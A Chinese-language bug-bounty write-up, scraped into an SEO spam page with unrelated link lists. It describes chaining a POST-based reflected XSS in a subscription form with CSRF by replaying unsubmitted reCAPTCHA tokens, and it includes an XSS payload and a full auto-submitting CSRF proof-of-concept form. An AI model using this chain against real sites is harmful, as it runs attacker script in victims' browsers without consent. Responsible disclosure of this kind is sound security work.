当前位置: 首页 > news >正文

谷歌提交网站廊坊百度关键词优化

谷歌提交网站,廊坊百度关键词优化,武汉市新洲区做网站,做外贸门户网站视频教程在我主页简介或专栏里 (不懂都可以来问我 专栏找我哦) 目录:  确认 XSS 漏洞 确认 CSRF 漏洞 这个漏洞是我在应用程序的订阅表单中发现的一个 XSS 漏洞,只能通过 POST 请求进行利用。通常情况下,基于 POST 的…

视频教程在我主页简介或专栏里

(不懂都可以来问我 专栏找我哦)

目录: 

    确认 XSS 漏洞

 确认 CSRF 漏洞

这个漏洞是我在应用程序的订阅表单中发现的一个 XSS 漏洞,只能通过 POST 请求进行利用。通常情况下,基于 POST 的 XSS 如果没有与 CSRF 结合来展示其影响力,那么这就是一个普通的反射型 XSS(Self XSS)。本来这不会成为一个大问题,但这个表单中实现了 Google reCAPTCHA v2。本文将探讨我是如何绕过 CAPTCHA,从而成功实现 CSRF 攻击的。

图片

为了保持匿名性,我们假设目标网站是 https://www.target.com。当你访问 target.com 时,会看到一个注册和登录表单,但引起我注意的是一个订阅按钮,该按钮会将你引导至 https://www.target.com/subscribe。在这个页面上,会显示一个表单。

图片

提交表单后,我们会收到一条感谢消息,其中显示了我们的名字(例如 John)。

图片

确认 XSS 漏洞

我们可以使用以下 payload 在该字段中测试反射型 XSS 漏洞:

"><svg/onload=confirm(document.domain)>

图片

当我们提交表单时,payload 被成功执行。现在我们已经确认了漏洞的存在,但问题在于,这个漏洞基于 POST 请求,如果没有 CSRF 的配合,它就会变成一个自我 XSS(Self XSS)。

图片

确认 CSRF 漏洞

如果 CAPTCHA 没有被稳健地实现,它并不能保护应用程序免受 CSRF 攻击,主要作用只是提供一定程度的速率限制。在解决 CAPTCHA 后,会生成三个动态参数:captcha_sidcaptcha_token 和 g_recaptcha_response。这里的“动态”是指它们的值会在每次解决 CAPTCHA 时发生变化。要构造一个完美的 CSRF 表单,我们需要能够为这些参数传递有效的值。

图片

那么,如果我在另一个浏览器中解决了 CAPTCHA,但不将其提交到服务器,而是将这些答案重放到 CSRF 表单中,会怎样呢? 我在一个私密标签页中打开了表单页面,填写了表单内容,然后解决了 CAPTCHA。我在 Burp Suite 中启用了拦截功能,并点击了提交。请求被拦截后,我复制了 CAPTCHA 参数的值,并将它们插入到我的 CSRF 漏洞利用演示(PoC)表单中。

<html> <body> <h1>CSRF PoC</h1> <form action="https://www.target.com/subscribe" method="POST"> <input type="hidden" name="name_first" value="'><svg/onload=confirm(document.domain)>" /> <input type="hidden" name="name_last" value="Doe" /> <input type="hidden" name="email_address" value="test@fake.com" /> <input type="hidden" name="company_name" value="FakeCompany" /> <input type="hidden" name="captcha_sid" value="INSERT-HERE" /> <input type="hidden" name="captcha_token" value="INSERT-HERE" /> <input type="hidden" name="captcha_response" value="Google no captcha" /> <input type="hidden" name="g-recaptcha-response" value="INSERT-HERE" /> <input type="hidden" name="captcha_cacheable" value="1" /> <input type="hidden" name="op" value="Submit" /> <input type="hidden" name="form_build_id" value="form-Vwtw-XX&" /> <input type="hidden" name="form_id" value="XX_subscribe_sign_up_form" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body></html>

剩下要做的就是将这个 CSRF 漏洞利用表单托管起来,让受害者访问。受害者访问你的恶意网站后,会被重定向到 https://www.target.com/subscribe,订阅表单会在没有任何交互的情况下自动提交,JavaScript 代码则会在他们的浏览器中执行。

图片

总结来说,CAPTCHA 并未绑定到用户的会话,因此未提交的其他用户的 CAPTCHA 答案可以被重放,用于我们的攻击。

我将这一发现提交给了他们的安全团队,他们迅速确认并修复了这个问题。

图片

视频教程在我主页简介或专栏里

(不懂都可以来问我 专栏找我哦)

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关

http://www.15wanjia.com/news/4594.html

相关文章:

  • 石家庄网站定制模板建站seo点击
  • 国外在线crm系统suitecrm惠州百度seo哪家好
  • 做网站月收入ks免费刷粉网站推广马上刷
  • 学做网站要学什么东西百度竞价排名怎么做
  • 展示网站如何做网站的优化和推广方案
  • wordpress多站点 seoseo推广专员招聘
  • 做网站要学百度seo排名点击软件
  • asp 企业网站源码网络推广文案有哪些
  • vultr做网站seo营销推广多少钱
  • 网站建设脱颖而出seo搜索优化服务
  • 有没有必要给企业做网站百度指数批量查询
  • 加盟营销型网站制作seo建设者
  • 有什么免费建网站网站百度手机端排名怎么查询
  • 情感视频素材网站加强服务保障满足群众急需ruu7
  • 广州网站建设公司嘉御大数据比较好的培训机构
  • 网站开发 质保金查询seo
  • 郑州网站开发定制谷歌搜索入口365
  • 网站开发技术要求sem培训班学费哪个好
  • 菏泽做网站公司搜索推广代运营
  • 微信公众号开发者中心滕州网站建设优化
  • 家具公司网站源码全网营销系统1700元真实吗
  • 美团初期是怎么建网站北京网络排名优化
  • 做网站可以用什么语言推广接单平台
  • 标志在线设计网站上海怎么做seo推广
  • 网站建设分金手指排名二八链接地址
  • 南京网站开发公司seo顾问多少钱
  • 武汉营销型网站多少钱抖音关键词排名查询工具
  • 福州网站建设外包焊工培训ppt课件
  • wordpress模板文件是哪个文件夹优化关键词的正确方法
  • 绵阳网站维护托管湖南seo网站多少钱